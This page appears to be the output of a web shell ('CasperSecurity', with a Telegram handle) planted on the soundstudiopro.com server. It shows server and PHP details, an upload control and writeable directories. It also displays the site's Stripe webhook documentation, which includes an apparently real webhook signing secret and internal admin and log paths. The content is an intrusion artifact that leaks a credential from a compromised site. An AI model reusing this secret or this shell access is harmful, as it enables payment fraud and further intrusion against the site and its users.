T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/soundstudiopro.com/public_html/WEBHOOK_INTEGRATION.md
# Stripe Webhook Integration with Admin Dashboard

## Overview

The Stripe webhook system is now fully integrated with the admin dashboard, providing centralized management of API keys, webhook secrets, and testing capabilities.

## Current Configuration

### Webhook Endpoint
- **URL**: `https://soundstudiopro.com/webhooks/stripe`
- **File**: `webhooks/stripe.php`
- **Status**: ✅ Active and configured

### Webhook Secret
- **Secret**: `whsec_t00jaqKxTfpIijPJ9Aq1mn300sSjD7T4`
- **Location**: Configured in `webhooks/stripe.php`
- **Admin Dashboard**: Available in API Management → Payment tab

## Admin Dashboard Integration

### Access Path
**Admin Panel → API Management → Payment tab**

### Features Available
1. **API Key Management**
   - View and edit Stripe API keys
   - Toggle API status (active/inactive)
   - Test API connectivity

2. **Webhook Configuration**
   - Webhook URL display and copying
   - Webhook secret management
   - Webhook endpoint testing

3. **Security Features**
   - Password-masked webhook secrets
   - Secure API key storage
   - One-click secret copying

## Webhook Functionality

### Supported Events
- `payment_intent.succeeded` - Successful payments
- `payment_intent.payment_failed` - Failed payments
- `customer.subscription.created` - New subscriptions
- `customer.subscription.updated` - Subscription updates
- `customer.subscription.deleted` - Subscription cancellations
- `invoice.payment_succeeded` - Successful invoice payments
- `invoice.payment_failed` - Failed invoice payments

### Payment Processing
- **Credit Purchases**: Automatically adds credits to user accounts
- **Track Purchases**: Records track ownership and credit usage
- **Mixed Cart**: Handles combined credit + track purchases
- **Email Confirmations**: Triggers order confirmation emails

### Logging System
- **Webhook Events**: `logs/stripe_webhooks.log`
- **Successful Payments**: `logs/stripe_success.log`
- **Failed Payments**: `logs/stripe_failures.log`
- **User Actions**: `logs/stripe_actions.log`
- **Track Purchases**: `logs/track_purchases.log`
- **Mixed Cart**: `logs/mixed_cart_payments.log`

## Admin Dashboard Usage

### Testing Webhook
1. Go to Admin Panel → API Management → Payment
2. Click "Test" button next to Stripe webhook
3. System will test webhook endpoint and signature verification
4. Results displayed via notification system

### Copying Webhook URL
1. Navigate to API Management → Webhooks tab
2. Click "Copy" button next to Stripe webhook
3. URL copied to clipboard for Stripe dashboard configuration

### Copying Webhook Secret
1. Navigate to API Management → Webhooks tab
2. Click "Secret" button next to Stripe webhook
3. Webhook secret copied to clipboard

### Managing API Keys
1. Go to API Management → Payment tab
2. Edit Stripe API configuration
3. Save changes to update configuration
4. Test API connectivity

## Security Considerations

### Webhook Verification
- All webhook requests verified using Stripe signature
- Invalid signatures rejected with 400 status
- Webhook secret stored securely in configuration

### API Key Security
- API keys masked in admin interface
- Passwords hidden by default
- Secure storage in configuration files

### Access Control
- Admin-only access to API management
- Session-based authentication required
- Secure HTTPS communication

## Troubleshooting

### Webhook Not Receiving Events
1. Check webhook URL in Stripe dashboard
2. Verify webhook secret matches
3. Test webhook endpoint from admin panel
4. Check server logs for errors

### Payment Processing Issues
1. Verify API keys are correct
2. Check payment intent metadata
3. Review webhook event logs
4. Test API connectivity

### Email Notifications
1. Check email configuration in admin panel
2. Verify SMTP settings
3. Test email functionality
4. Review email activity logs

## File Structure

```
webhooks/
├── stripe.php              # Main webhook handler
└── (other webhooks)

admin_includes/
├── api.php                 # API management interface
└── (other admin files)

config/
├── email.php              # Email configuration
└── database.php           # Database configuration

logs/
├── stripe_webhooks.log    # Webhook events
├── stripe_success.log     # Successful payments
├── stripe_failures.log    # Failed payments
├── stripe_actions.log     # User actions
├── track_purchases.log    # Track purchases
└── mixed_cart_payments.log # Mixed cart processing
```

## Next Steps

1. **Monitor Webhook Activity**: Use admin dashboard to track webhook events
2. **Test Payment Flows**: Verify end-to-end payment processing
3. **Review Logs**: Check logs for any issues or improvements
4. **Update Documentation**: Keep this documentation current with changes

## Support

For webhook-related issues:
1. Check admin dashboard API management
2. Review webhook logs
3. Test webhook endpoint
4. Verify Stripe dashboard configuration

CasperSecurity Mini